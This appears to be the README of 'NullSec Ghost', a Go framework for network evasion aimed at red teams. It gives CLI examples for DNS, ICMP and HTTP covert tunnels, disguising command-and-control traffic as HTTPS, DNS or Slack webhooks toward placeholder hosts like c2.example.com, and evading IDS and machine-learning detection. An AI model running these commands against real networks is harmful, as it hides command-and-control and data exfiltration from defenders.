Advanced Network Stealth & Evasion Framework
Traffic Obfuscation β’ Protocol Mimicry β’ Covert Channels β’ Anti-Detection
NullSec Ghost is a comprehensive network stealth framework written in Go. It provides tools for traffic obfuscation, protocol mimicry, and covert channel establishment for authorized red team operations and security research.
| Feature | Description |
|---|---|
| π Traffic Obfuscation | Scramble, pad, and encrypt network traffic |
| π Protocol Mimicry | Make traffic appear as legitimate protocols |
| π‘ Covert Channels | DNS, ICMP, HTTP tunneling |
| π Traffic Shaping | Normalize patterns to avoid ML detection |
| π‘οΈ Anti-IDS | Evade signature-based detection |
| π Multi-Hop | Chain proxies with protocol mixing |
# Obfuscate outbound traffic
ghost obfuscate --mode scramble --target 10.0.0.1:443
# Pad traffic to fixed sizes
ghost obfuscate --mode padding --size 1024
# XOR encrypt with rotating key
ghost obfuscate --mode xor --key random# Mimic HTTPS traffic
ghost mimic --protocol https --target c2.example.com
# Mimic DNS queries
ghost mimic --protocol dns --target dns.example.com
# Mimic Slack/Teams webhooks
ghost mimic --protocol webhook --platform slack# DNS tunneling
ghost covert dns --domain tunnel.example.com --mode bidirectional
# ICMP tunneling
ghost covert icmp --target 10.0.0.1 --payload-size 64
# HTTP covert channel
ghost covert http --url https://example.com/api --method cookies# Normalize traffic timing
ghost shape --mode timing --interval 100ms --jitter 20ms
# Mimic browser patterns
ghost shape --profile chrome --sites google.com,github.com
# Anti-ML evasion
ghost shape --mode ml-evasion --model random-forest# From source
go build -o ghost ./cmd/ghost
# Install
sudo mv ghost /usr/local/bin/# ghost.yaml
obfuscation:
enabled: true
mode: scramble
padding: true
pad_size: 1024
mimicry:
protocol: https
user_agent: "Mozilla/5.0..."
tls_fingerprint: chrome
covert:
channel: dns
domain: tunnel.example.com
encoding: base32
shaping:
timing:
interval: 100ms
jitter: 20%
burst_size: 5
profile: browserObserve and adapt to network patterns without generating suspicious traffic.
Actively obfuscate and disguise all outbound communications.
Dynamically switch protocols and patterns based on network environment.
# Chameleon mode - auto-adapt
ghost --mode chameleon --target c2.example.com- Network detection system testing
- IDS/IPS evasion research
- Traffic analysis countermeasures
- Red team C2 infrastructure
- Covert communication research
bad-antics β’ Part of NullSec Linux